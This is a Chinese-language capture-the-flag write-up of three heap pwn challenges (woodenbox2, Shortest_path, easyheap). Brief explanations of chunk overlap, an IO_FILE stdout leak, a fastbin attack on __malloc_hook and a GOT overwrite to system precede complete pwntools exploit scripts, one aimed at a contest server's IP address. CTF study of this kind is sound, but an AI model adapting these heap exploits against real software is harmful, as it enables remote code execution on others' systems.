高校戰疫網絡安全分享賽pwn覆盤

就做了一個pwn我tcl
但是收穫很多
總結一下還是不夠細心如果細心一點估計還能做34個tttttcl

woodenbox2

這道題有先是用chunk overlop然後將unsortbin切割到fastbin(此時unsortbin與fastbin指向了同一個堆塊)通過堆溢出將低位覆蓋爲stdout上面的位置然後寫IO_FILE結構體leaklibc基址然後通過fastbin attack打malloc_hook即可
IO_FILE結構體的知識可看一下

https://wiki.x10sec.org/pwn/io_file/exploit-in-libc2.24/

exp:

from pwn import *
p=process('./woodenbox2')
elf=ELF('./woodenbox2')
libc=elf.libc

def add(size,name):
	p.sendlineafter(':','1')
	p.sendlineafter(':',str(size))
	p.sendafter(':',name)

def edit(idx,size,content):
	p.sendlineafter(':','2')
	p.sendlineafter(':',str(idx))
	p.sendlineafter(':',str(size))
	p.sendafter(':',content)

def delete(idx):
	p.sendlineafter(':','3')
	p.sendlineafter(':',str(idx))


add(0x68,'0'*0x68)
add(0x68,'1'*0x68)
add(0x68,'2'*0x68)
add(0x68,'3'*0x68)
edit(0,0x70,'0'*0x68+p64(0xe1))
delete(1)
delete(1)
add(0x38,'a'*0x38)
add(0x28,'b'*0x28)
payload='b'*0x28+p64(0x71)+'\xdd\x25'
edit(2,len(payload),payload)
add(0x68,'\x00'*0x68)

add(0x68,'\x00'*0x33+p64(0xfbad3c80)+3*p64(0)+p8(0))
libcbase=u64(p.recvuntil('\x7f')[-6:]+'\x00\x00')-libc.sym['_IO_2_1_stderr_']-192
log.success('libcbase: '+hex(libcbase))
o_g=[0x45216,0x4526a,0xf02a4,0xf1147]
one_gadget=libcbase+o_g[0]
malloc_hook=libcbase+libc.sym['__malloc_hook']
realloc=libcbase+libc.sym['__libc_realloc']
delete(3)
payload='a'*0x28+p64(0x71)+p64(malloc_hook-0x23)
edit(1,len(payload),payload)
add(0x68,'a'*0x68)
add(0x68,'a'*11+p64(one_gadget)+p64(realloc+15))
p.sendlineafter(':','1')
p.sendlineafter(':',str(size))
p.interactive()

Shortest_path

這題flag盡然讀入到了堆上面直接填過去打印就行了
exp:

#!/usr/bin/python2
from pwn import *
p=process('./Shortest_path')

def add(idx,pri,size,name,num):
	p.sendlineafter('> ','1')
	p.sendlineafter(': ',str(idx))
	p.sendlineafter(': ',str(pri))
	p.sendlineafter(': ',str(size))
	p.sendlineafter(':',name)
	p.sendlineafter(': ',str(num))

add(0,2,0x68,'\x11'*0x38,0)
add(1,2,0x68,'\x11'*0x38,0)
add(2,2,0x68,'\x11'*0x38,0)
add(3,2,0x48,'\x11'*0x30,0)
p.sendlineafter('> ','4')
p.sendlineafter(': ',str(3))
p.sendlineafter(': ','3')
p.interactive()

easyheap

這題堆上面有指針沒有清空可以使用fastbin鏈表的性質2次利用將freegot寫成put即可泄露然後將free寫成system釋放拿到shell
exp:

#!/usr/bin/python2
from pwn import *
#p=process('./easyheap')
p=remote('121.36.209.145',9997)
elf=ELF('./easyheap')
#libc=ELF('./libc.so.6')
libc=elf.libc

def add(size,content):
	p.sendlineafter(':','1')
	p.sendlineafter('?',str(size))
	p.sendafter('?',content)

def timuchadd(size):
	p.sendlineafter(':','1')
	p.sendlineafter('?',str(size))

def edit(idx,content):
	p.sendlineafter(':','3')
	p.sendlineafter('?',str(idx))
	p.sendafter('?',content)

def delete(idx):
	p.sendlineafter(':','2')
	p.sendlineafter('?',str(idx))

add(0x68,'\x11'*4)#0
add(0x180,'\x12'*4)#1
add(0x20,'/bin/sh\x00')
delete(0)
delete(1)
timuchadd(0x100000)
timuchadd(0x100000)
edit(0,p64(0)+p64(0x21)+p64(elf.got['free'])+p64(0x1000)+p64(0)+p64(0x71)+p64(0)*13+p64(0x21)+p64(0x6020C0))
edit(0,p64(elf.got['atoi']))
edit(1,p64(elf.plt['puts']))
delete(0)
o_g=[0x45216,0x4526a,0xf02a4,0xf1147]
libcbase=u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))-libc.sym['atoi']
one_gadget=libcbase+o_g[3]
system=libcbase+libc.sym['system']
edit(1,p64(system))
log.success('libcbase: '+hex(libcbase))
delete(2)
p.interactive()